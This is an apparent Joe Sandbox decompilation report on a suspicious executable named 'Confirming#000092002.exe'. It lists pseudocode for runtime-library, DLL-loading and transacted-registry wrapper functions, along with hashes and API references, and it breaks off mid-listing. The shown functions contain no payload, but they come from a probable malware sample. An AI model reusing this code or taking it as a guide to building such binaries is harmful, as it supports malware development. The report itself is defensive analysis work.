0x00000000
0x00000000
0x00000000
0x00ead71a
0x00000000
0x00ead6a8
0x00ead543
0x00ead84b
0x00ead84b
0x00ead84d
0x00ead850
0x00ead850
0x00ead850
0x00ead850
0x00ead862
0x00ead864
0x00ead865
0x00ead866
0x00ead870

APIs

GetConsoleOutputCP.KERNEL32(00000000,?,?), ref: 00EAD50D
__fassign.LIBCMT ref: 00EAD6F2
__fassign.LIBCMT ref: 00EAD70F
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EAD757
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EAD797
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EAD83F

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 365976987f0b67f918501e71225336cc3d65166a14fda347004bba85ef5cc07d
Instruction ID: 15085ca8cd7d475fdc5edaef968d96cb59f379557fe49cce197c5bbcb2bb7d9f
Opcode Fuzzy Hash: 365976987f0b67f918501e71225336cc3d65166a14fda347004bba85ef5cc07d
Instruction Fuzzy Hash: 34C18FB5D042588FCB15CFA8C8809EDBBF9FF4E314F28516AE856BB242D631AD45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EA5DDA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00EA5DDA(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0xeb9020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00EA6F9D(_t13, __eflags,  *0xeb9020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00EA6FD8(_t14, __eflags,  *0xeb9020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E00EA8AC4();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00EA6FD8(_t18, __eflags,  *0xeb9020, 0);
								} else {
									_t8 = E00EA6FD8(_t18, __eflags,  *0xeb9020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00EA7188(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x00ea5dda
0x00ea5de1
0x00ea5df4
0x00ea5dfb
0x00ea5dfd
0x00ea5dfe
0x00ea5e01
0x00ea5e1a
0x00ea5e1a
0x00ea5e03
0x00ea5e03
0x00ea5e05
0x00ea5e0f
0x00ea5e16
0x00ea5e18
0x00ea5e1f
0x00ea5e28
0x00ea5e2b
0x00ea5e2c
0x00ea5e2e
0x00ea5e42
0x00ea5e42
0x00ea5e4b
0x00ea5e30
0x00ea5e37
0x00ea5e3d
0x00ea5e3e
0x00ea5e40
0x00ea5e54
0x00ea5e56
0x00ea5e56
0x00000000
0x00000000
0x00000000
0x00ea5e40
0x00ea5e59
0x00000000
0x00000000
0x00000000
0x00ea5e18
0x00ea5e05
0x00ea5e61
0x00ea5e6b
0x00ea5de3
0x00ea5de5
0x00ea5de5

APIs

GetLastError.KERNEL32(?,?,00EA5DD1,00EA5516,00EA4B3F), ref: 00EA5DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EA5DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EA5E0F
SetLastError.KERNEL32(00000000,00EA5DD1,00EA5516,00EA4B3F), ref: 00EA5E61

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 807694bcca647d75093581e2b82abf889efcdf1e9fc91df3c5e419d60f4d6e75
Instruction ID: a79e3b4449ceea1e58c1113816c84336ecb0627c53ef7b89bd8e5bc5111ae741
Opcode Fuzzy Hash: 807694bcca647d75093581e2b82abf889efcdf1e9fc91df3c5e419d60f4d6e75
Instruction Fuzzy Hash: 6201F13760DB266EAB102EB57C856673AA8EB1F778730132AF2207C0E1EE113C059140

Uniqueness

Uniqueness Score: -1.00%

Function 00EA5EBA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00EA5EBA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0xeb7098);
				E00EA4730(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00EA56D0(_t107, E00EA5496(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00EA56D0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xfe2740; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xeb1278();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00EA8A26(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0xeb70b8);
									E00EA4730(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00EA5EBA(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00EA6BC0(_t103, _t108[0x18], E00EA5496( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00EA6BD0(_t103, _t108[0x18], E00EA5496( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00EA5496();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00ea5eba
0x00ea5ebc
0x00ea5ec1
0x00ea5ec6
0x00ea5ec8
0x00ea5ecb
0x00ea5ed0
0x00ea5fe0
0x00ea5fe0
0x00ea5fe0
0x00000000
0x00ea5edf
0x00ea5edf
0x00ea5ee4
0x00ea5eee
0x00ea5ef0
0x00ea5ef5
0x00ea5efa
0x00ea5efa
0x00ea5efc
0x00ea5eff
0x00ea5f04
0x00ea5f26
0x00ea5f26
0x00ea5f29
0x00ea5f2c
0x00ea5f4a
0x00ea5f4d
0x00ea5f8c
0x00ea5f8f
0x00ea5f92
0x00ea5fb7
0x00ea5fb9
0x00000000
0x00ea5fbb
0x00ea5fbb
0x00ea5fbd
0x00000000
0x00ea5fbf
0x00ea5fbf
0x00ea5fc4
0x00ea5fc8
0x00ea5fc8
0x00ea5fc9
0x00000000
0x00ea5fc9
0x00ea5fbd
0x00ea5f94
0x00ea5f94
0x00ea5f96
0x00000000
0x00ea5f98
0x00ea5f98
0x00ea5f9a
0x00000000
0x00ea5f9c
0x00ea5fad
0x00000000
0x00ea5fb2
0x00ea5f9a
0x00ea5f96
0x00ea5f4f
0x00ea5f4f
0x00ea5f53
0x00000000
0x00ea5f59
0x00ea5f59
0x00ea5f5b
0x00000000
0x00ea5f61
0x00ea5f68
0x00ea5f70
0x00ea5f74
0x00ea5f76
0x00ea5f79
0x00ea5f7e
0x00ea5f7f
0x00000000
0x00ea5f7f
0x00ea5f79
0x00000000
0x00ea5f74
0x00ea5f5b
0x00ea5f53
0x00ea5f2e
0x00ea5f2e
0x00000000
0x00ea5f2e
0x00ea5f0b
0x00ea5f0b
0x00ea5f10
0x00ea5f15
0x00000000
0x00ea5f17
0x00ea5f19
0x00ea5f22
0x00ea5f31
0x00ea5f33
0x00ea5ff2
0x00ea5ff2
0x00ea5ff7
0x00ea5ff8
0x00ea5ffa
0x00ea5fff
0x00ea6004
0x00ea6007
0x00ea600a
0x00ea600d
0x00ea6016
0x00ea6016
0x00ea600f
0x00ea600f
0x00ea600f
0x00ea6019
0x00ea601d
0x00ea6020
0x00ea6021
0x00ea6022
0x00ea6023
0x00ea6026
0x00ea602f
0x00ea602f
0x00ea6032
0x00ea6068
0x00ea6034
0x00ea6034
0x00ea6034
0x00ea6037
0x00ea604e
0x00ea604e
0x00ea6037
0x00ea606d
0x00ea6077
0x00ea6083
0x00ea5f41
0x00ea5f41
0x00ea5f46
0x00ea5f47
0x00ea5f81
0x00ea5f88
0x00ea5fcc
0x00ea5fcc
0x00ea5fd3
0x00ea5fe2
0x00ea5fe5
0x00ea5ff1
0x00ea5ff1
0x00ea5f33
0x00ea5f15
0x00000000
0x00000000
0x00000000
0x00ea5ee4

APIs

___AdjustPointer.LIBCMT ref: 00EA5F81
___AdjustPointer.LIBCMT ref: 00EA5FA4
___AdjustPointer.LIBCMT ref: 00EA6040

Strings

"G, xrefs: 00EA5F19

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: AdjustPointer
String ID: "G
API String ID: 1740715915-265486630
Opcode ID: 9ead9d24141c46eaa2e97ebeb830d16f3e9f7f048dbb4249b47a987e2de196f2
Instruction ID: aab262740b4f71102f6b12f39732001e160d9f7fd84339b758240ee0557837c7
Opcode Fuzzy Hash: 9ead9d24141c46eaa2e97ebeb830d16f3e9f7f048dbb4249b47a987e2de196f2
Instruction Fuzzy Hash: C951C27B605A02AFDB298F14D841BAA77E4EF4E314F245529F812AF691E731BC84C790

Uniqueness

Uniqueness Score: -1.00%

Function 00EAA6B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EAA6B8(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E00EAB146(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00EAB146(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E00EA759E(GetLastError());
									_t17 =  *((intOrPtr*)(E00EA75D4(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00EAA77F(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00EA759E(GetLastError());
						_t17 =  *((intOrPtr*)(E00EA75D4(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00EAA77F(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00EAA7A6(_a8);
				return 0;
			}

0x00eaa6be
0x00eaa6c3
0x00eaa6d7
0x00eaa6da
0x00eaa70c
0x00eaa714
0x00eaa716
0x00eaa72f
0x00eaa732
0x00eaa735
0x00eaa743
0x00eaa752
0x00eaa75a
0x00eaa75c
0x00eaa775
0x00eaa778
0x00eaa778
0x00eaa75e
0x00eaa765
0x00eaa770
0x00eaa770
0x00eaa77a
0x00eaa77b
0x00000000
0x00eaa77b
0x00eaa73a
0x00eaa73f
0x00eaa741
0x00000000
0x00000000
0x00000000
0x00eaa741
0x00eaa71f
0x00eaa72a
0x00000000
0x00eaa72a
0x00eaa6dc
0x00eaa6df
0x00eaa6e2
0x00eaa6f5
0x00eaa6f8
0x00eaa6fa
0x00eaa6fc
0x00000000
0x00eaa6fc
0x00eaa6e8
0x00eaa6ed
0x00eaa6ef
0x00000000
0x00000000
0x00000000
0x00eaa6ef
0x00eaa6c8
0x00000000

Strings

C:\Users\user\Desktop\Confirming#000092002.exe, xrefs: 00EAA6BD

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Confirming#000092002.exe
API String ID: 0-2125958311
Opcode ID: a706d353c1d13c2b17312458d68ec817ad061c4472b431ccff8e3740f06633d4
Instruction ID: 334785b7c3d3e31f4049179c9d71c103bb36bcd0315e8e7691f49773eeb2d8e3
Opcode Fuzzy Hash: a706d353c1d13c2b17312458d68ec817ad061c4472b431ccff8e3740f06633d4
Instruction Fuzzy Hash: C22180716043066FDB20AF718C81D6B77BCAF5A3687185626F855BF151EB20FC00C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00EA6E42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00EA6E42(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0xfe27c4 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0xeb1dbc + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00EA8B48(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00ea6e49
0x00ea6ebe
0x00ea6e4e
0x00ea6e50
0x00ea6e57
0x00ea6e5c
0x00ea6e65
0x00ea6e74
0x00ea6e7d
0x00ea6e81
0x00ea6eca
0x00ea6ecc
0x00ea6ed0
0x00ea6ed3
0x00ea6ed3
0x00ea6ed9
0x00ea6ed9
0x00ea6ec5
0x00ea6ec9
0x00ea6ec9
0x00ea6e83
0x00ea6e8c
0x00ea6eb6
0x00ea6eb9
0x00ea6ebb
0x00ea6ebb
0x00000000
0x00ea6ebb
0x00ea6e8e
0x00ea6e99
0x00ea6e9e
0x00ea6ea3
0x00000000
0x00000000
0x00ea6eaa
0x00ea6eb0
0x00ea6eb4
0x00000000
0x00000000
0x00000000
0x00ea6eb4
0x00ea6e61
0x00000000
0x00000000
0x00000000
0x00ea6e63
0x00ea6ec3
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00EA6F05,?,?,00FE276C,00000000,?,00EA7030,00000004,InitializeCriticalSectionEx,00EB1EB0,InitializeCriticalSectionEx,00000000), ref: 00EA6ED3

Strings

api-ms-, xrefs: 00EA6E93

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: a855665e636913cd46fa075a17328237c2af071be7d9ef7db7d62cb4061a619d
Instruction ID: dfb33a690b00bf301ce6033fa51d78d5d535949b075be42975119c3080b1f7ca
Opcode Fuzzy Hash: a855665e636913cd46fa075a17328237c2af071be7d9ef7db7d62cb4061a619d
Instruction Fuzzy Hash: 08110A3AA01225ABCB215768DC5179B37A49F0B774F189251EA11FF280D770FF0486D1

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1348 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00EA1348(intOrPtr* __ecx, void* _a4, char* _a8, void** _a32, int* _a36) {
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t18;

				_t18 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36);
				}
				_t13 = GetModuleHandleA("Advapi32.dll");
				if(_t13 == 0) {
					goto L6;
				}
				_t14 = GetProcAddress(_t13, "RegCreateKeyTransactedA");
				if(_t14 == 0) {
					goto L6;
				}
				return  *_t14(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36,  *_t18, 0);
			}

0x00ea134c
0x00ea1353
0x00ea1393
0x00ea13b2
0x00000000
0x00ea13b4
0x00000000
0x00ea13aa
0x00ea135a
0x00ea1362
0x00000000
0x00000000
0x00ea136a
0x00ea1372
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00EA135A
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00EA136A
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00EA13AA

Strings

Advapi32.dll, xrefs: 00EA1355
RegCreateKeyTransactedA, xrefs: 00EA1364

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: AddressCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedA
API String ID: 1964897782-1184998024
Opcode ID: ba39a93603768a94297e681ef04cb521514fc2ae5ddecd9d2a819df39f95cd3d
Instruction ID: b8627ddd0a43a96fe3e148c8c57e5b86992c8c2e1a25cd70159547fe20a839d7
Opcode Fuzzy Hash: ba39a93603768a94297e681ef04cb521514fc2ae5ddecd9d2a819df39f95cd3d
Instruction Fuzzy Hash: 93016232104244BADF310F929C08DA77E7DEBCEB55B019269FA09B4410D671E854EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EA12E5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00EA12E5(intOrPtr* __ecx, void* _a4, char* _a8, int _a16, void** _a20) {
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t18;

				_t18 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegOpenKeyExA(_a4, _a8, 0, _a16, _a20);
				}
				_t13 = GetModuleHandleA("Advapi32.dll");
				if(_t13 == 0) {
					goto L6;
				}
				_t14 = GetProcAddress(_t13, "RegOpenKeyTransactedA");
				if(_t14 == 0) {
					goto L6;
				}
				return  *_t14(_a4, _a8, 0, _a16, _a20,  *_t18, 0);
			}

0x00ea12e9
0x00ea12f0
0x00ea1328
0x00ea133f
0x00000000
0x00ea1341
0x00000000
0x00ea1337
0x00ea12f7
0x00ea12ff
0x00000000
0x00000000
0x00ea1307
0x00ea130f
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00EA12F7
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00EA1307
RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00EA1337

Strings

Advapi32.dll, xrefs: 00EA12F2
RegOpenKeyTransactedA, xrefs: 00EA1301

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: AddressHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedA
API String ID: 1337834000-496252237
Opcode ID: 0c5f4b9b58dc03065d55b54fab13bcabe1b1ce34c9de28b13992ee3c8279e405
Instruction ID: b3fb666ae6a8e96975c0d683945fa3218c54b61a7f483578471c5e13b9426823
Opcode Fuzzy Hash: 0c5f4b9b58dc03065d55b54fab13bcabe1b1ce34c9de28b13992ee3c8279e405
Instruction Fuzzy Hash: 8AF0AF32100205FFCF221F92EC04DEB7F6EEB8AB51B408069F941B9420C7329865EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1596 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

